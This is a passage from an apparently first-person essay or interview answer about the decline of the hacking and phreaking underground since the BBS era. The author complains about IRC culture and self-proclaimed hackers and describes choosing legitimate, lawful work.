D ----------| Asking this question is analogous to asking a question about the future of 8-tracks or dodo birds. The underground is no longer underground. Forums which once existed for the discussion of hacking/phreaking, and the use of technology toward that end, now exist for bands of semi-skilled programmers and self-proclaimed security experts to yammer about their personal lives, which exist almost entirely on the awful medium known as IRC. The BBS, where the hack/phreak underground grew from, is long since dead. Any chump can buy access to the largest network in the world for $19.95 a month, then show up on IRC or some other equally lame forum, claiming to be a hacker because they read bugtraq and can run exploits (or even worse, because they can utilize denial-of-service attacks). The hacker mindset has become a nonexistent commodity in the new corporate and media-friendly 'underground.' And everyone who was a real part of the hacking/phreaking scene - at one point or another decided they'd rather make money being legit than risk legal troubles and wrecking their future for nothing. Myself included. The watered down underground's definition of a hacker is invariably something like: "Someone who can code," or "Someone who can hack webpages," etc. The motives and goals of this 'scene' are also entirely different, and it can be safely concluded that it will continue to degenerate further, at a rapid pace. On the flip side, going legit is a good thing... I, for one, would rather be on the right side of the law, and getting paid for it - it was fun while it lasted, and I learned